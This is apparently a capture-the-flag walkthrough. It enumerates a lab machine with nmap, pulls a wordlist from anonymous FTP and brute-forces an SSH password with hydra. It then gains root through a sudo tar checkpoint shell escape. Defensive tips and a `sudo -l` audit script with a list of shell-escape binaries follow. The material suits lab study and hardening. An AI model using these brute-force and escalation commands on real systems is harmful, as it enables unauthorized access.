sudo nmap 10.10.10.243
The website doesn't reveal any crucial information for the pentest.
We see that anonymous login is allowed on the FTP service.
There are two files on the FTP server:
task.txt, which contains a note "signed" by someone called lin;
locks.txt, which contains unintelligible words.
One hint would be to use locks.txt as a wordlist for a dictionary attack on lin's password for the SSH service.
Yes! It works. We can use this password to connect to the target via SSH.
We find the user flag this way in user.txt.
For escalation, a good habit is to check which sudo commands the user can run on the target.
We can use GTFOBins to see how we can exploit this.
Use SCP, which runs over the SSH protocol, instead of FTP.
Use a password manager instead of writing passwords in clear text in a file.
Check sudo rights on machines.
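One way to carry out the sudo-rights check from the defender's side, as an added example that is not part of the original write-up: a small filter that reads `sudo -l` output and flags rules allowing binaries with documented shell escapes. The `RISKY_BINS` list is a short illustrative subset of GTFOBins, the sample output (host name `target`, the paths, the `reboot` and `less` rules) is constructed, and the parser assumes one rule per line.

```shell
#!/bin/sh
# Binaries that GTFOBins documents as able to start a shell or run arbitrary
# commands when allowed under sudo. Illustrative subset, not exhaustive.
RISKY_BINS="tar vi vim find awk less more man nmap perl python python3 env bash sh zip"

# audit_sudo_list: reads `sudo -l` output on stdin, prints one finding per risky rule.
audit_sudo_list() {
    awk -v risky="$RISKY_BINS" '
    BEGIN { n = split(risky, a, " "); for (i = 1; i <= n; i++) bad[a[i]] = 1 }
    # Rule lines look like:   (root) NOPASSWD: /bin/tar, /usr/bin/less /var/log/syslog
    /^[ \t]+\(/ {
        line = $0
        sub(/^[ \t]+\([^)]*\)[ \t]*/, "", line)       # drop the (runas) part
        nopass = (line ~ /NOPASSWD:/) ? " NOPASSWD" : ""
        gsub(/[A-Z_]+:[ \t]*/, "", line)               # drop tags such as NOPASSWD:
        m = split(line, cmds, /,[ \t]*/)               # one rule line may list several commands
        for (j = 1; j <= m; j++) {
            split(cmds[j], w, " ")
            path = w[1]                                # first word is the binary, rest are fixed args
            if (path == "ALL") { print "HIGH" nopass ": ALL commands allowed"; continue }
            base = path; sub(/.*\//, "", base)
            if (base in bad) print "HIGH" nopass ": " path " (shell escape possible)"
        }
    }'
}

# Constructed sample of `sudo -l` output (user name taken from the write-up,
# everything else is made up for the example).
sample_sudo_l() {
cat <<'EOF'
Matching Defaults entries for lin on target:
    env_reset, mail_badpass

User lin may run the following commands on target:
    (root) /bin/tar
    (root) NOPASSWD: /sbin/reboot, /usr/bin/less /var/log/syslog
EOF
}

# On a real host, as root: sudo -l -U lin | audit_sudo_list
sample_sudo_l | audit_sudo_list
```

A fixed argument list does not make a pager or editor safe: the `less` rule is flagged because the shell escape is available from inside the program regardless of which file it was opened on.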
sudo nmap -A -p 21,22,80 10.10.10.243
ftp 10.10.170.79
hydra -s 22 -l lin -P locks.txt 10.10.10.243 ssh -V
sudo -l
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh